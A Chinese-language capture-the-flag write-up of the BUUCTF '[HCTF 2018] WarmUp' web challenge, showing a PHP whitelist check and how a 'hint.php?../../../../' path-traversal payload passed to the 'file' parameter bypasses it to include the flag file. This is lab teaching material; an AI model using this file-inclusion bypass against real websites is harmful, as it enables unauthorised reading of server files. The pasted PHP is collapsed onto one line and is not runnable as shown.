刷題平臺：https://buuoj.cn
題目地址：https://buuoj.cn/challenges#[HCTF%202018]WarmUp

解題步驟：
1、訪問：http://26778d38-6a95-4982-9d92-c945c10aaafe.node3.buuoj.cn

2、出現一個滑稽頭像并按快捷鍵F12查看源碼，出現提示信息source.php

3、將/source.php復制到地址欄已有地址后面
http://26778d38-6a95-4982-9d92-c945c10aaafe.node3.buuoj.cn/source.php
訪問后可看見PHP源碼（可以把源碼復制到本地后去分析）

<?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){//定義白名單，1個是source.php,1個是hint.php$whitelist = ["source"=>"source.php","hint"=>"hint.php"]; //可以直接訪問hint.php// 判斷變量是否聲明，判斷是否為字符串if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}//判斷是否在白名單內if (in_array($page, $whitelist)) {return true;}//截取兩個問號之間的值，該值需要在白名單參數內$_page = mb_substr($page,0,mb_strpos($page . '?', '?') //?flag);//如果參數為白名單，則返回真if (in_array($_page, $whitelist)) { //hint.php?../flagreturn true;}//url進行解碼，并截取兩個問號之間的值$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));//再次校驗是否在白名單內if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;}}//傳遞參數不能為空，要是字符串，需要經過emmm類的過濾if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?>

4、http://26778d38-6a95-4982-9d92-c945c10aaafe.node3.buuoj.cn/hint.php——》http://26778d38-6a95-4982-9d92-c945c10aaafe.node3.buuoj.cn/ffffllllaaaagggg


5、返回上一步進行傳參http://927f3d79-e593-4f7a-ada4-c345a8b1e0b7.node3.buuoj.cn/source.php?file=hint.php

http://927f3d79-e593-4f7a-ada4-c345a8b1e0b7.node3.buuoj.cn/source.php?file=ffffllllaaaagggg

6、http://927f3d79-e593-4f7a-ada4-c345a8b1e0b7.node3.buuoj.cn/source.php?file=hint.php?../…/…/…/…/ffffllllaaaagggg


correct！

總結

以上是生活随笔為你收集整理的BUUCTF-WEB：[HCTF 2018]WarmUp的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。